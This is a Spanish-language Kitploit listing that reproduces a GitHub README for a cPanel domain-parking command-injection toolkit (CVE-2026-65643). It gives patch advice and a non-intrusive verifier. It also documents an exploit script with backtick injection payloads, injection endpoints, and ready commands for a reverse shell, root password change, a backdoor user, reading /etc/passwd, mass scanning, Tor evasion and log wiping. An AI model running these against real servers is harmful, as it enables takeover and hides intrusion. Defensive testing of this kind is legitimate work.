Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-65643-PoC-Toolkit — Kit de herramientas para equipo Red/Blue para CVE-2026-65643, una RCE de estacionamiento de dominios en cPanel. Incluye exploit con reverse shell, webshell, persistencia y escaneo masivo, además de un verificador no intrusivo para detección y auditoría. | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
Escalada de PrivilegiosEscáneres de VulnerabilidadesMecanismos de PersistenciaExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónComando y ControlRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Desarrollo de Payloads
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

Kit de herramientas para equipo Red/Blue para CVE-2026-65643, una RCE de estacionamiento de dominios en cPanel. Incluye exploit con reverse shell, webshell, persistencia y escaneo masivo, además de un verificador no intrusivo para detección y auditoría.

Ver Repositorio
hace 1 díaAún no revisado

CVEPoC

CVE‑2026‑65643 – Kit de herramientas RCE para Domain Parking de cPanel

Python 3.8+ CVSS Author cPanel

⚠️ USO EXCLUSIVAMENTE ÉTICO – PRUEBAS DE SEGURIDAD AUTORIZADAS
Este repositorio proporciona herramientas únicamente para profesionales de seguridad autorizados, equipos azules y probadores de penetración.
El acceso no autorizado a sistemas informáticos es ilegal según la CFAA (EE. UU.), la Ley de Uso Indebido de Computadoras (Reino Unido), el TCK 243/244 (Turquía) y leyes similares en todo el mundo.


📖 Resumen de la vulnerabilidad

CVE‑2026‑65643 es una vulnerabilidad crítica de inyección de comandos en cPanel & WHM versiones 11.x que permite a un usuario autenticado de cPanel ejecutar comandos arbitrarios del sistema con privilegios de root a través de la funcionalidad de dominio en estacionamiento (domain parking).

Cómo funciona

  1. Se requiere acceso autenticado – el atacante debe tener una cuenta cPanel válida (usuario/contraseña) en el servidor objetivo.
  2. Inyección en domain parking – al añadir un dominio en estacionamiento, el nombre de dominio no se sanitiza correctamente, lo que permite al atacante inyectar comandos de shell utilizando comillas invertidas (`).
  3. Ejecución de comandos – el comando inyectado es ejecutado por el sistema con los privilegios del usuario de cPanel, que pueden escalarse a root mediante técnicas de escalada de privilegios.
  4. Privilegios de root – debido a que la operación de domain parking se ejecuta con permisos suficientes, se pueden ejecutar comandos arbitrarios con privilegios elevados.
  5. Impacto – compromiso total del servidor, robo de datos, puertas traseras, ransomware y movimiento lateral. ¡Actualice inmediatamente!

Versiones afectadas

  • cPanel & WHM 11.110.0.140 y anteriores – vulnerable
  • 11.134.0.52 y anteriores – vulnerable
  • 11.136.0.36 y anteriores – vulnerable
  • 11.138.0.1 y anteriores – vulnerable
  • 11.138.1.6 y posteriores – parcheado

Parche

  • Actualice a cPanel & WHM 11.138.1.6, 11.138.0.2, 11.136.0.37, 11.134.0.53 o 11.110.0.141 o versiones más recientes.
  • Si la actualización no es posible, deshabilite los permisos de domain parking para los usuarios de cPanel como solución temporal.

🧰 Herramientas

HerramientaPropósitoUsuario previsto
exploit.pyKit de herramientas completo armado con shell inversa, webshell, persistencia, lectura/escritura de archivos, cambio de contraseña de root, escaneo masivo, soporte Tor y funciones OPSEC.

📊 Comparación de características


🎯 Resumen de casos de uso


⚙️ Instalación

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 Parámetros

Parámetros de exploit.py

Parámetros de verifier.py


💥 Escenarios


🧪 Endpoints y métodos de inyección

El exploit utiliza los siguientes endpoints y métodos de inyección de cPanel:

Formato del payload

root@kitploit:~
# Formato del payload de inyección
test.com`<comando>`

# Ejemplo
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ Uso responsable

  • Utilice estas herramientas únicamente en sistemas que posea o para los que tenga permiso escrito explícito para realizar pruebas.
  • El acceso no autorizado es ilegal y poco ético.
  • Los autores no son responsables de ningún uso indebido.
  • Siga siempre las leyes y regulaciones de su país.

Este software se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.

Descargar herramienta
Equipos rojos / pentesters autorizados
verifier.pyComprobador de vulnerabilidades no intrusivo que detecta la versión de cPanel, valida la inyección y evalúa el riesgo sin ejecutar ningún payload malicioso. Genera informes detallados.Equipos azules / auditores de seguridad
Característicaexploit.pyverifier.py
Detección de vulnerabilidades✅✅
Detección de versión (4 endpoints)✅✅
Inyección de comandos✅❌
Shell inversa✅❌
Subida de WebShell✅❌
Persistencia (creación de usuario cPanel)✅❌
Cambio de contraseña de root✅❌
Lectura/escritura de archivos✅❌
4 métodos de inyección (JSON/Form/CGI/API2)✅✅
Soporte Tor (anonimato)✅❌
Rotación de User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
Escaneo masivo (multi‑hilo)✅❌
Shell interactiva✅❌
Modo no intrusivo (seguro)❌✅
Registro de línea de tiempo✅✅
Informe HTML✅❌
Informe JSON✅✅
Limpieza de registros (anti‑forense)✅✅
Soporte de proxy✅✅
User‑Agent personalizado✅✅
Control de verificación SSL✅✅
EscenarioHerramienta recomendada
Equipo azul – verificar si su instalación de cPanel es vulnerableverifier.py
Auditoría de seguridad – evaluación de vulnerabilidades no intrusivaverifier.py
Equipo rojo – pruebas de penetración autorizadas con explotación completaexploit.py
Bug Bounty – pruebas de divulgación responsableverifier.py
Escaneo masivo – comprobar múltiples objetivos en busca de vulnerabilidadesexploit.py (solo detección)
Respuesta a incidentes – comprobar si los sistemas están comprometidosverifier.py
ParámetroDescripción
-t, --targetURL de cPanel objetivo (p. ej. https://cpanel.example.com:2083)
-l, --target-fileArchivo que contiene la lista de objetivos (uno por línea) para escaneo masivo
-u, --usernameNombre de usuario de cPanel
-P, --passwordContraseña de cPanel
-p, --portSobrescribir el puerto de cPanel (por defecto el de la URL o 2083)
--threadsNúmero de hilos para múltiples objetivos (por defecto: 10)
-o, --outputGuardar informe JSON en un archivo
--html-reportGuardar informe HTML en un archivo
-v, --verboseSalida detallada
--proxyProxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080)
--torEnrutar a través de Tor (localhost:9050)
-ua, --user-agentUser‑Agent personalizado
--no-keep-aliveNo mantener la sesión activa
--delayRetardo entre solicitudes (por defecto: 2.0s)
--jitterJitter aleatorio (0‑1 s) entre solicitudes (por defecto: 0.5)
--max-retriesReintentos máximos (por defecto: 5)
--ssl-verifyVerificar certificados SSL
--timeoutTiempo de espera de la solicitud (por defecto: 15s)
--cmdEjecutar un único comando en el objetivo
--reverse-shellShell inversa IP:PUERTO
--passwdCambiar la contraseña de root
--adduserCrear usuario de cPanel (USUARIO DOMINIO CONTRASEÑA)
--readLeer un archivo
--writeEscribir un archivo (especificar ruta)
--write-contentContenido a escribir
--cleanupLimpiar registros e historial después de la explotación
-i, --interactiveShell interactiva después de la explotación
--domain-suffixSufijo para el dominio en estacionamiento (por defecto: exploit.local)
ParámetroDescripción
-t, --targetURL de cPanel objetivo (p. ej. https://cpanel.example.com:2083)
-u, --usernameNombre de usuario de cPanel
-P, --passwordContraseña de cPanel
-o, --outputGuardar informe JSON en un archivo
-v, --verboseSalida detallada
--proxyProxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080)
--torEnrutar a través de Tor (localhost:9050)
--ssl-verifyVerificar certificados SSL
--timeoutTiempo de espera de la solicitud (por defecto: 15s)
--cleanupLimpiar registros después de la prueba
#EscenarioComando
1Comprobación rápida de vulnerabilidadpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2Escaneo detallado con informepython verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3Shell inversapython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Ejecutar comandopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5Leer archivo sensiblepython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Cambiar contraseña de rootpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Crear nuevo usuario de cPanel (persistencia)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Shell interactiva después de la explotaciónpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Escaneo masivo desde archivopython exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10Usar proxy, Tor y User‑Agent personalizadopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11Limpiar registros después de la explotaciónpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
MétodoEndpointDescripción
API JSON/cpsessXXXXX/json-api/domainMétodo de inyección principal mediante payload JSON
Datos de formulario/cpsessXXXXX/json-api/domainInyección alternativa mediante datos codificados en formulario
Script CGI/cgi-sys/domainpark.cgiInyección en endpoint CGI heredado
API2/cpsessXXXXX/json-api/cpanelMétodo de inyección API2 heredado